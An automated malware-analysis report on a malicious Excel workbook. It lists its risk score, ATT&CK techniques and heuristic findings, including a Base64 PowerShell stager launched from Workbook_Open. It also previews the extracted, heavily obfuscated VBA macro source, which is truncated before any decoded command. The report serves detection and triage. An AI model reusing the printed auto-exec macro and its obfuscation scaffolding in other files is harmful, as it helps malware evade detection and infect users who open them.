MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The critical OLE_VBA_SHELL and OLE_VBA_BASE64_SHELL_COMMAND_STAGER heuristics indicate that the Workbook_Open macro executes a Base64 encoded PowerShell command. This command is likely responsible for downloading and executing a second-stage payload. The obfuscated nature of the VBA code and the use of encoded commands suggest a deliberate attempt to evade detection.
Heuristics 7
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGERVBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14843 bytes |
SHA-256: 9852770022283bc0d03befca403d61733d4d4a687c535519b7d8832e47d58e8e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
XRt4bgFPUd_fUS9.fEysLhWhTBNlppK2s3So
Do Until "Ykq8y" <> "vwgEA_9SlGJQCNZ5QCmvuLTIKwf8c"
Dim g4Xz4ZuzaSBORChAjon3sFhDJ As Byte
Dim ChbV4LbAzDLvZHwnDzsjfbHvHkF2_sYUToz1RcgEhNb9TNH As CheckBox
Loop
Do Until "fzMoPxbniXpMREj6Em1ZuQ6UjQ" <> "mAQ_IZ4ajA"
Dim zDGf1_PakON98QUTcwWN31D8JaViNNRzeh_BdSitAdsTCmB As Byte
Dim my7ECUG89ITYmpLV6WcYLSyHLlLX As CheckBox
Loop
Do Until "Gs5g" <> "XW6XQLwHZFBT8I"
Dim FSPVWoHlvR_ As Byte
Dim w3ZGrzNMw_OtwDsiT9_QcI As CheckBox
Loop
Do Until "Cd2FtUNXuklXcRVAqPwEJ" <> "H1icQn_xmpA"
Dim emz5Nk_39XNnFXjYLRQxdV93mRmapHiG4k3 As Byte
Dim ybZu_J3Fu4LaDqM2dT1fGn6Q67lKzxEseet6vgKlj As CheckBox
Loop
Do Until "OL8Y1htaP_vCDtJe" <> "HxGgpP7xc5h6Q_7HM52"
Dim a81_W2shsRpZu As Byte
Dim iYlrD_39OI659wIJFmxG1rgQsso7qLdvcwV1bN_HB3 As CheckBox
Loop
Do Until "Kx4HW_i" <> "Wko1Q3z2T8SX6QBnHaKYQq2g"
Dim nE8fsWjTjVRjy5J4e9GOtsEkHHtqKnPosF As Byte
Dim KK5SH7W9xh8ayMOP4Rikw5_UWil2G5Em1qr98K As CheckBox
Loop
Do Until "yJ2u5flpSfZ" <> "t8_FSPKh5iSdz2bTjGdPRqbXsB_bs"
Dim pOEaLJGgsVawYOOzW As Byte
Dim BDQEJAIkBdpVQPryNRMC As CheckBox
Loop
Do Until "mpTvztCc2ZKgUG7XZiDDPjH" <> "l1U_"
Dim JDjA7lSOTrdNZ8oskQGAIRR As Byte
Dim WnNHuBgq5cn1XQXN5A1lo6TlEj1fTrT52uLUqbhMvAitvEPaKBK9RplaSl As CheckBox
Loop
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "XRt4bgFPUd_fUS9"
Dim anyHn6MqLKYuJP1HKhLqOkQhrGm3EuT85SlZ7SDjHFRZiEIQAOu1ftOzVOYeRTjazaz1nZK1dlgGQ18l8T1z9caICuDp3gPxfziGNR As String
Function CII_VKHr9mDCgbalynViz9SYTQfTlKGuB_YXDvmVkCEmVHdsfoz7_suCzto(cM4ZonJM2qXBciIBV6zUmrdfjjhXtHIAL77HHAV76oQt__G4ijcLvesurVy__vcrgWyfl_2Ui3Y8Ysae)
Do Until "lzg3" <> "KVYOTbJkCOrL_pPqJZk"
Dim xLEKnH3W8pHQ8bDlsIyuqkrZqOL7OcaX6BK8PMkJhvlVEYMkkm7Ajz As Byte
Dim HKdncX65GdMtU6O_UehmK58TSQ As CheckBox
Loop
Do Until "AjTkeYw_2_" <> "cksKNmmGGUCQTfQa"
Dim b7mLMITJWTjf9x6PCOksuUXhPzL7NsNxRD7zanvROhx4BFGS As Byte
Dim XuM_4goEg_6V7V5n_vL5zEyWcQbLgdeH As CheckBox
Loop
Dim ZePsqJFV6VK6I3sSl3CDHxAfEz_bch28ArLDGW_TnETZVDbClG4IbcFkdsl1Im2W
Do Until "q2gbdI4tW1QUrXU3lIxO4LcR6y" <> "jkDagC"
Dim hvnDxbH51af8wboD6ijWoONdXNenhQp5RMw6sQD As Byte
Dim I_3WaodecIfod1IWRfIoi6cVhujnhnsTmeYWv1vy As CheckBox
Loop
Do Until "sBdBlKDHzdXilcMeexpDy6xZJA8Zv" <> "jZtSuz"
Dim S6iferIStAAK1 As Byte
Dim OBEuDwLCzkLlUOCnOzmSeK As CheckBox
Loop
Dim UWzJF6SARqfHfSsskizk_yEFb6x6_6dj9mjYFreubPwi_l6UbfCfhO
Do Until "FfRLnEZ97N4SWmhqCp5cSU3HbEo" <> "dIV2TDH9Mtig7YkOWa5n_qH"
Dim jlirhtmIthY6xiV As Byte
Dim iONnS7bH8CqEdqgZnwAvNtUjMiiy8fcvoA2nYUVKFc As CheckBox
Loop
Do Until "knzmGaLGtGwvFx3m" <> "YsVmIai4Ycy2_RYyotHqtjaGlz"
Dim uT933Cuv5l As Byte
Dim xbSHD5LnlSFar8FVnK2yQNARpN5fiuFMVw_LZ9l As CheckBox
Loop
Do Until "yVv" <> "dQsRk_vfWh3ESiZ_"
Dim by9p_zL3D5835nhCbesshVl4tBVgSPbYuYfwyppnDzNpB2ks_zmxzpa_L As Byte
Dim D5BbohwagGeGuLuxDorG522ZmgblniD8ajutmJXPZMctEjMm1 As CheckBox
Loop
Do Until "uAr7PKBkxGEIw8CfpJZ_I3P
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.